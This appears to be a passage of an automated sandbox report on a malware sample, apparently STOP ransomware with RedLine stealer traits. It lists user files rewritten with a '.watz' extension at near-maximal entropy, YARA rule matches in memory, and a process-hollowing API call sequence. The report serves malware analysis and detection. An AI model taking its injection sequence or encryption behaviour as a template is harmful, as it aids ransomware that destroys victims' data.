          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db entropy: 7.99842401779Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db entropy: 7.99778873592Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99816703516Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99209719022Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99720369554Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html entropy: 7.99829710199Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99874219332Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99768554768Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99589123013Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99439303401Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99757928563Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\AppData\Local\IconCache.db entropy: 7.99249873904Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.9959867764Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99516036815Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99526713251Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.9948399456Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.9962678907Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99745043519Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99696208992Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat entropy: 7.99115903383Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\Local Settings\IconCache.db.watz (copy) entropy: 7.99249873904Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.watz (copy) entropy: 7.99768564873Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.watz (copy) entropy: 7.99505226627Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Temp\scoped_dir5952_991612011\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.watz (copy) entropy: 7.9911912328Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm.watz (copy) entropy: 7.9936592669Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.watz (copy) entropy: 7.99050960649Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.watz (copy) entropy: 7.99754247681Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.watz (copy) entropy: 7.99642334442Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.watz (copy) entropy: 7.99275977369Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.watz (copy) entropy: 7.99276670871Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.watz (copy) entropy: 7.99222281284Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.watz (copy) entropy: 7.9925754731Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001a.db.watz (copy) entropy: 7.99820906494Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db.watz (copy) entropy: 7.99842401779Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.watz (copy) entropy: 7.99778873592Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.watz (copy) entropy: 7.99816703516Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.watz (copy) entropy: 7.99209719022Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.watz (copy) entropy: 7.99720369554Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.watz (copy) entropy: 7.99829710199Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.watz (copy) entropy: 7.99874219332Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.watz (copy) entropy: 7.99768554768Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2.watz (copy) entropy: 7.99589123013Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.watz (copy) entropy: 7.99439303401Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.watz (copy) entropy: 7.99757928563Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.watz (copy) entropy: 7.99526713251Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2.watz (copy) entropy: 7.9948399456Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.watz (copy) entropy: 7.9962678907Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.watz (copy) entropy: 7.99745043519Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.watz (copy) entropy: 7.99696208992Jump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.watz (copy) entropy: 7.99115903383Jump to dropped file

          System Summary

          barindex
          Source: 33.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 33.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 2.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 2.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 29.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 29.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 20.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 20.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 25.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 25.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 28.2.66d5df681876c_file010924.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 28.2.66d5df681876c_file010924.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 20.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 20.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.66d5df681876c_file010924.exe.23915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.66d5df681876c_file010924.exe.23915a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.66d5df681876c_file010924.exe.23915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.66d5df681876c_file010924.exe.23915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 21.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 21.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 2.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 2.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 29.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 29.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 25.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 25.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 28.2.66d5df681876c_file010924.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 28.2.66d5df681876c_file010924.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 24.2.66d5df681876c_file010924.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 24.2.66d5df681876c_file010924.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 33.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 33.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 24.2.66d5df681876c_file010924.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 24.2.66d5df681876c_file010924.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 21.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 21.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000020.00000002.2444319207.0000000002332000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000001C.00000002.1624704973.000000000228E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000018.00000002.1506583704.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000020.00000002.2444379499.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000006.00000002.1282127310.00000000022FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000001C.00000002.1624809590.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000019.00000002.1522339744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000019.00000002.1522339744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000000.00000002.1232942398.00000000022C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000001D.00000002.1635910279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000001D.00000002.1635910279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000014.00000002.1380517656.0000000002181000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000021.00000002.2454668093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000021.00000002.2454668093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000005.00000002.1261344737.000000000233F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000018.00000002.1506412476.00000000022EA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 6228, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 6476, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 1512, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 4244, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 1424, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: 66d5df681876c_file010924.exe PID: 7864, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_02360110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02360110
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_023E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_023E0110
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 6_2_02390110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,6_2_02390110
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0040D2610_2_0040D261
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0040B88F0_2_0040B88F
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0040C4BC0_2_0040C4BC
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_004085040_2_00408504
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0040B33E0_2_0040B33E
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023672200_2_02367220
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023E22C00_2_023E22C0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023AE37C0_2_023AE37C
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023673930_2_02367393
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0237F0300_2_0237F030
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236A0260_2_0236A026
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236B0000_2_0236B000
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236B0B00_2_0236B0B0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023630F00_2_023630F0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023670E00_2_023670E0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023700D00_2_023700D0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023691200_2_02369120
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023AE1410_2_023AE141
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0238D1A40_2_0238D1A4
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023AB69F0_2_023AB69F
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236A6990_2_0236A699
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236E6E00_2_0236E6E0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236C7600_2_0236C760
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236A79A0_2_0236A79A
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0238D7F10_2_0238D7F1
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023635200_2_02363520
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023675200_2_02367520
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236CA100_2_0236CA10
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_02367A800_2_02367A80
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_02370B000_2_02370B00
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_02362B600_2_02362B60
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_0236DBE00_2_0236DBE0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023678800_2_02367880
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023818D00_2_023818D0
